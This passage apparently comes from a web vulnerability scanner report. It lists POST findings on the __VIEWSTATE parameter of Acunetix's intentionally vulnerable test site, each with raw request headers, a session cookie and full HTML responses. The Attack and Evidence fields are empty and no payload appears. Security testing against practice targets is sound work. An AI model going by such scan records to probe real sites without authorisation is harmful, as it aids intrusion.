style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8443&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAkxWMDNsIZGRkNY2Ii1O25YT2JTxy2z2s9WF2J6U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLSzuXWCgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBRHYJT7DI9%2BUK8O65ljBtl3su2Lj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:00 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAkxWMDNsIZGRkNY2Ii1O25YT2JTxy2z2s9WF2J6U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLSzuXWCgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBRHYJT7DI9+UK8O65ljBtl3su2Lj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:White" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8431&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAnhgeA9sIZGRkHpX2TNA5NSi2pDj87ag8lGw0NFU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfvZKZDQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeLVG77bQ9lEEZ2vQdhz4NGRS2DV
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:05 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAnhgeA9sIZGRkHpX2TNA5NSi2pDj87ag8lGw0NFU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfvZKZDQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeLVG77bQ9lEEZ2vQdhz4NGRS2DV" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:White" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a 